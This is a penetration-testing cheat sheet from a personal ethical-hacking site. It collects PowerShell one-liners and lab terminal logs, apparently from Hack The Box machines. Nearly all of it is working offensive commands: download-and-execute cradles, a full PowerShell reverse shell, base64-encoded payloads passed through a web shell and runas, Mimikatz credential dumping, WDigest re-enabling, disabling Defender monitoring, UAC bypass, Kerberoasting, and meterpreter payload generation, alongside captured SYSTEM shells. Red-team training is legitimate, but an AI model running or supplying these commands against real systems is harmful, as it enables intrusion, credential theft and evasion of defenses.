puckiestyle – ethical hacking
For info or a quote, mail us at info@puckiestyle.nl or use the contact form
whoami : Network / System Engineer , Security specialist from Meppel (NL)
powershell oneliners
PowerShell (any version):
(New-Object System.Net.WebClient).DownloadFile("http://10.10.14.19/shell-443.exe", "C:\FTP\Intranet\shell-443.exe")
PS C:\users\hillie>
(New-Object System.Net.WebClient).DownloadFile(“http://192.168.178.16:8000/MS14-058.exe”, “c:\users\public\MS14-058.exe”)
C:\> PowerShell (New-Object System.Net.WebClient).DownloadFile('http://192.168.178.16:8000/launcher.bat’,’launcher.bat'); Start-Process ‘launcher.bat'
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.178.16',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
PS C:\Users\hillie>
IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.178.16/puckieshell443.ps1’)
C:\Users\hillie>
cmdkey /list
Currently stored credentials: Target: Domain:interactive=HTB\Administrator Type: Domain Password User: HTB\Administrator
c:\Python37>
python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.98 - - [28/Feb/2019 19:38:58] "GET /puckieshell443.ps1 HTTP/1.1" 200 -
c:\Users\Public>
certutil -urlcache -split -f http://10.10.14.20/puckieshell443.ps1
PS C:\pentest>
certutil.exe -f -split -VerifyCTL http://192.168.178.12/msbuild_nps.xml
CertUtil: -verifyCTL command FAILED: 0x8009310b (ASN: 267 CRYPT_E_ASN1_BADTAG) CertUtil: ASN1 bad tag value met. PS C:\pentest>
dir *.bin
Directory: C:\pentest Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 5/7/2019 4:16 PM 5462 619bd719eb0f011e589ef17f4fd8693d9ba8d481.bin PS C:\pentest>
mv 619bd719eb0f011e589ef17f4fd8693d9ba8d481.bin msbuild_nps.xml
PS C:\pentest>
dir *.xml
Directory: C:\pentest Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 5/7/2019 4:16 PM 5462 msbuild_nps.xml
C:\Users\Public>
runas /user:HTB\administrator /savecred “powershell IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.14.20/puckieshell443.ps1’)”
C:\Users\jacco>
nc -lvp 443
listening on [any] 443 ... 10.10.10.xx: inverse host lookup failed: h_errno 11004: NO_DATA connect to [10.10.14.20] from (UNKNOWN) [10.10.10.98] 49167: NO_DATA Windows PowerShell running as user Administrator on HTB Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\Windows\system32>
whoami
HTB\administrator
root@kali:~/htb/access#
echo -n “IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.14.20/puckieshell53.ps1’)” | iconv –to-code UTF-16LE | base64 -w 0
SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAwAC8AcAB1AGMAawBpAGUAcwBoAGUAbABsADUAMwAuAHAAcwAxACcAKQA=
c:\Users\Public>
runas /user:ACCESS\administrator /savecred “powershell -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAwAC8AcAB1AGMAawBpAGUAcwBoAGUAbABsADUAMwAuAHAAcwAxACcAKQA=”powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString(‘http://192.168.178.13/powercat.ps1’);powercat -c 192.168.178.13 -p 1234 -e cmdFull documentation here.
PowerShell 4.0 & 5.0:
PS C:\Users\hillie> Invoke-WebRequest "http://192.168.178.50/shell-443.exe" -OutFile "C:\FTP\intranet\shell-443.exe"
PS C:\Users\hillie>
xp_cmdshell “PowerShell IEX(New-Object Net.WebClient).DownloadString(‘http://10.10.14.20/puckieshell443.ps1’)xp_cmdshell “PowerShell IEX(IWR(‘http://10.10.14.20/puckieshell443.ps1’))”
Full documentation here.
c:\inetpub\wwwroot\internal-01\log>
powershell
powershell Windows PowerShell Copyright (C) 2016 Microsoft Corporation. All rights reserved. Cannot load PSReadline module. Console is running without PSReadline. PS C:\inetpub\wwwroot\internal-01\log>
$username = ‘BART\h.potter’
PS C:\inetpub\wwwroot\internal-01\log>
$securePassword = ConvertTo-SecureString -AsPlainText -Force ‘Password1’
PS C:\inetpub\wwwroot\internal-01\log>
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
PS C:\inetpub\wwwroot\internal-01\log>
Enter-PSSession -ComputerName localhost -Credential $credential
[localhost]: PS C:\Users\h.potter\Documents> whoami
bart\h.potter [localhost]: PS C:\Users\h.potter\Documents>
[System.Environment]::Is64BitOperatingSystem
True
[localhost]: PS C:\Users\h.potter\Documents>
[System.Environment]::Is64BitProcess
True
PS C:\users>
IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.178.16:8000/Sherlock.ps1’)
Title : Win32k Elevation of Privilege MSBulletin : MS16-135 CVEID : 2016-7255 Link : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S ample-Exploits/MS16-135 VulnStatus : Appears Vulnerable
PS C:\Users\hillie>
powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://www.puckiestyle.nl/ps/powerup.ps1‘);Invoke-AllChecks”
PS C:\Users\hillie>
(new-object net.webclient).downloadfile(‘http://10.10.14.20/powerup.ps1’, ‘C:\users\mssql-svc\appdata\local\temp\powerup.ps1’)
PS C:\users\mssql-svc\appdata\local\temp>
import-module ./powerup.ps1
[*] Running Invoke-AllChecks PS C:\Users\hillie> powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/invoke-mimikatz.ps1');Invoke-Mimikatz" PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/powerview.ps1');Get-IPAddress" PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/windowsenum.ps1')" PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/jaws.ps1')" Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.50/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.78.50 -Lport 4444 PS C:\users\hillie> (New-Object System.Net.WebClient).DownloadFile("http://192.168.178.16:8000/MS14-058.exe", "c:\users\public\MS14-058.exe")
d:\PENTEST\impacket-examples-windows-master>psexec puckiestyle.local/administrator@192.168.178.200
PS D:\PENTEST\impacket-examples-windows-master> Connect-PSSession -ComputerName 192.168.178.200 -Credential administrator
C:\WINDOWS\system32>psexec.exe \\192.168.178.200 -u puckiestyle\puck -p p@ssw0rd cmd.exe
wmic /NODE:”DC01″ /USER:”puckiestyle\administrator” OS GET Name
wmic /node:192.168.23.214 NIC get description,macaddress
wmic /USER:”puckiestyle\puck” /PASSWORD:”p@ssw0rd” /NODE:192.168.178.200 process call create “powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.178.50/Invoke-Mimikatz.ps1’); Invoke-Mimikatz -DumpCreds | Out-File C:\\Users\\public\\a.txt”
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
rundll32.exe user32.dll,LockWorkStation
root@kali#
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=443 -f exe -o mrshell-p443.exe
root@kali#
msfconsole -x “use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.14.20; set lport 443; set ExitOnSession false; exploit -j”
PS C:\WINDOWS\system32>
Set-MpPreference -DisableRealtimeMonitoring $true
PS C:\WINDOWS\system32>
Set-MpPreference -DisableIOAVProtection $true
change claire password to Password!
Powershell Set-ADAccountPassword -Reset -NewPassword (ConvertTo-SecureString -String ‘Password1!’ -AsPlainText -Force) -Identity Claire
Login as Claire and Grant Tom access to Backup_Admins
Powershell Add-ADGroupmember -Identity Backup_Admins -Members tom
Want to add a brand new executable extension (also callable from a .bat)?
C:\Users\jacco>set PATHEXT=%PATHEXT%;.puck
C:\Users\jacco>set pathext
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.puck
Want to know Applocker status from a cmd shell?
powershell -nop -c "import-module applocker; get-command *applocker*"
powershell -nop -c "import-module applocker; Get-AppLockerPolicy -Effective -Xml"
Set TrustedHosts with PowerShell (as Admin)
Set-Item -Path WSMan:\localhost\Client\TrustedHosts -Value "Computer1,Computer2"
And check (don’t need Admin for that)
Get-Item WSMan:\localhost\Client\TrustedHosts
c:\users\public\
powershell IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.14.20/puckieshell53.ps1’)
root@kali:~/htb/optimum#
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.8 - - [09/Apr/2019 10:06:51] "GET /puckieshell53.ps1 HTTP/1.1" 200 -
root@kali:~/htb/optimum#
nc -lvp 53
Ncat: Version 7.70 ( https://nmap.org/ncat ) Ncat: Listening on :::53 Ncat: Listening on 0.0.0.0:53 Ncat: Connection from 10.10.10.8. Ncat: Connection from 10.10.10.8:49541. Windows PowerShell running as user kostas on OPTIMUM Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\Users\kostas\Desktop>
[System.Environment]::Is64BitOperatingSystem
True PS C:\Users\kostas\Desktop>
[System.Environment]::Is64BitProcess
True
PS C:\users>
(New-Object System.Net.WebClient).DownloadFile(“http://192.168.178.16:8000/Invoke-MS16135.ps1”, “c:\users\public\Invoke-MS16135.ps1”)
PS C:\users\public>
import-module ./Invoke-MS16135.ps1
PS C:\users\public>
Invoke-MS16135 -Command “IEX(New-Object Net.WebClient).DownloadString(‘http://192.168.178.16/puckieshell53.ps1’)”
_____ _____ ___ ___ ___ ___ ___ | | __|_ | | _|___|_ | |_ | _| | | | |__ |_| |_| . |___|_| |_|_ |_ | |_|_|_|_____|_____|___| |_____|___|___| [by b33f -> @FuzzySec] [!] Success, spawning a system shell!
root@kali:~/htb#
nc -lvp 53
listening on [any] 53 ... 192.168.178.11: inverse host lookup failed: Unknown host connect to [192.168.178.16] from (UNKNOWN) [192.168.178.11] 49238 Windows PowerShell running as user hillie on HILLIE Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\users\public>
whoami
nt authority\system
PS C:\users\public>
If you ever need to enable RDP (mstsc) on a Windows 10 machine, and you can’t get to the System control panel item, use Powershell to enable RDP:
# Enable Remote Desktop
(Get-WmiObject Win32_TerminalServiceSetting -Namespace root\cimv2\TerminalServices).SetAllowTsConnections(1,1) | Out-Null
(Get-WmiObject -Class “Win32_TSGeneralSetting” -Namespace root\cimv2\TerminalServices -Filter “TerminalName=’RDP-tcp'”).SetUserAuthenticationRequired(0) | Out-Null
Get-NetFirewallRule -DisplayName “Remote Desktop*” | Set-NetFirewallRule -enabled true
Execute aboves cmdlets as Administrator in Powershell, and RDP should work.
To test the connection, open Powershell on another machine, and run:
PS C:\Users\jacco>
Test-NetConnection 10.10.10.97 -CommonTCPPort rdp
ComputerName : 10.10.10.97 RemoteAddress : 10.10.10.97 RemotePort : 3389 InterfaceAlias : Ethernet 2 SourceAddress : 10.10.14.12 TcpTestSucceeded : True PS C:\Users\jacco>
PS C:\Users\jacco>
[Convert]::ToBase64String([IO.File]::ReadAllBytes( “C:\PENTEST\secret.txt”))
ZGl0IGJlc3RhbmQgaXMgZ2VoZWltDQpncm9ldGplcyBQdWNr PS C:\Users\jacco>
PS C:\pentest>
[IO.File]::WriteAllBytes( “c:\pentest\new.txt” ,[Convert]::FromBase64String( “ZGl0IGJlc3RhbmQgaXMgZ2VoZWl
tDQpncm9ldGplcyBQdWNr”))
PS C:\pentest> type new.txt dit bestand is geheim groetjes Puck
# Description: # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1’);Invoke-BypassUAC -Command ‘start powershell.exe'”
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1’);Invoke-Mimikatz -DumpCreds”
# Import Mimikatz Module to run further commands
powershell.exe -exec Bypass -noexit -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1’)”
# Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1’);’$env:COMPUTERNAME’|Invoke-MassMimikatz -Verbose”
# PowerUp: Privilege escalation checks
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks”
# Invoke-Inveigh and log output to file
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1’);Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y”
# Invoke-Kerberoast and provide Hashcat compatible hashes
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1’);Invoke-kerberoast -OutputFormat Hashcat”
# Invoke-ShareFinder and print output to file
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1’);Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt”
# Import PowerView Module to run further commands
powershell.exe -exec Bypass -noexit -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1’)”
# Invoke-Bloodhound
powershell.exe -exec Bypass -C “IEX(New-Object Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1’);Invoke-BloodHound”
# Find GPP Passwords in SYSVOL
findstr /S cpassword $env:logonserver\sysvol\*.xml findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)
# Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
runas /user:DOMAIN\USER /noprofile powershell.exe
# Insert reg key to enable Wdigest on newer versions of Windows
reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/puckiestyle/powershell/refs/heads/master/rev.ps1')
then
cat cradle | iconv -t utf-16le | base64 -w0; echo SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcAB1AGMAawBpAGUAcwB0AHkAbABlAC8AcABvAHcAZQByAHMAaABlAGwAbAAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAcwB0AGUAcgAvAHIAZQB2AC4AcABzADEAJwApAAoACgA=
then
http://10.10.11.17/data/modules/shell.php?cmd=powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcAB1AGMAawBpAGUAcwB0AHkAbABlAC8AcABvAHcAZQByAHMAaABlAGwAbAAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAcwB0AGUAcgAvAHIAZQB2AC4AcABzADEAJwApAAoACgA=
(c)2024